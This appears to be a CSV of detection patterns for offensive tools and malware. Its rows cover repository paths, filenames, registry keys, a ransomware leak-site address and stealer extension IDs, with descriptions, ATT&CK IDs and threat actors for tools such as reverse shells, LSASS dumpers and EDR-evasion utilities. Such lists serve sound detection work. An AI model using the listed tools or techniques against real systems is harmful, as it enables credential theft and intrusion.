"*HiveJack-Console.exe*",".{0,1000}HiveJack\-Console\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","47211"
"*hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion*",".{0,1000}hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47212"
"*HiwinCN/Htran*",".{0,1000}HiwinCN\/Htran.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","47213"
"*HKCU\Software\*Rans-MSG*",".{0,1000}HKCU\\Software\\.{0,1000}Rans\-MSG.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47221"
"*HKCU\Software\*Rans-Status*",".{0,1000}HKCU\\Software\\.{0,1000}Rans\-Status.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47222"
"*HKEY_CURRENT_USER\Software\*Rans-MSG*",".{0,1000}HKEY_CURRENT_USER\\Software\\.{0,1000}Rans\-MSG.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47224"
"*HKEY_CURRENT_USER\Software\*Rans-Status*",".{0,1000}HKEY_CURRENT_USER\\Software\\.{0,1000}Rans\-Status.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47225"
"*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","47236"
"*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","47237"
"*hlldz/dazzleUP*",".{0,1000}hlldz\/dazzleUP.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","47244"
"*hlldz/Phant0m*",".{0,1000}hlldz\/Phant0m.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","47245"
"*hlldz/RefleXXion*",".{0,1000}hlldz\/RefleXXion.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","47246"
"*hmaverickadams/autoNTDS*",".{0,1000}hmaverickadams\/autoNTDS.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","1","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","47247"
"*hmeobnfnfcmdkdcmlblgagmfpfboieaf*",".{0,1000}hmeobnfnfcmdkdcmlblgagmfpfboieaf.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47248"
"*hnfanknocfeofbddgcijnmhnfnkdnaad*",".{0,1000}hnfanknocfeofbddgcijnmhnfnkdnaad.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47249"
"*hoangprod/AndrewSpecial*",".{0,1000}hoangprod\/AndrewSpecial.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","47251"
"*Hoaxshell.exe*",".{0,1000}Hoaxshell\.exe.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","47253"
"*hoaxshell.py*",".{0,1000}hoaxshell\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","47254"
"*hoaxshell-listener.py*",".{0,1000}hoaxshell\-listener\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","47255"
"*holehe *@gmail.com*",".{0,1000}holehe\s.{0,1000}\@gmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47256"
"*holehe.core:main*",".{0,1000}holehe\.core\:main.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47257"
"*holehe\holehe*",".{0,1000}holehe\\holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47258"
"*holehe-master.*",".{0,1000}holehe\-master\..{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47259"
"*hollow *.exe *.bin*",".{0,1000}hollow\s.{0,1000}\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","0","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","47260"
"*hollower.Hollow(*",".{0,1000}hollower\.Hollow\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","47261"
"*Honey hash*",".{0,1000}Honey\shash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","New-HoneyHash.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","47263"
"*Hook installed in mstsc.exe, PID *",".{0,1000}Hook\sinstalled\sin\smstsc\.exe,\sPID\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","47264"
"*HookChainFinder M4v3r1ck by Sec4US Team*",".{0,1000}HookChainFinder\sM4v3r1ck\sby\sSec4US\sTeam.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","47265"
"*hookedbrowsers.rb*",".{0,1000}hookedbrowsers\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47266"
"*hook-infection_monkey.exploit.py*",".{0,1000}hook\-infection_monkey\.exploit\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47267"
"*hook-infection_monkey.network.py*",".{0,1000}hook\-infection_monkey\.network\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47268"
"*hook-infection_monkey.post_breach.actions.py*",".{0,1000}hook\-infection_monkey\.post_breach\.actions\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47269"
"*hook-infection_monkey.post_breach.py*",".{0,1000}hook\-infection_monkey\.post_breach\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47270"
"*hook-infection_monkey.ransomware.py*",".{0,1000}hook\-infection_monkey\.ransomware\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47271"
"*hook-infection_monkey.system_info.collectors.py*",".{0,1000}hook\-infection_monkey\.system_info\.collectors\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47272"
"*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","47273"
"*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","47274"
"*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","47275"
"*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","47276"
"*hook-pypsrp.py*",".{0,1000}hook\-pypsrp\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47277"
"*hook-pypykatz.py*",".{0,1000}hook\-pypykatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","47278"
"*hopefully it's a DA password*",".{0,1000}hopefully\sit\'s\sa\sDA\spassword.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","47279"
"*Hossam Ehab / An EDR (End Point Detection & Response) Evasion Tool*",".{0,1000}Hossam\sEhab\s\/\sAn\sEDR\s\(End\sPoint\sDetection\s\&\sResponse\)\sEvasion\sTool.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","47280"
"*'Host the Phising App'*",".{0,1000}\'Host\sthe\sPhising\sApp\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","47282"
"*HOST/EXEGOL-01.*",".{0,1000}HOST\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47283"
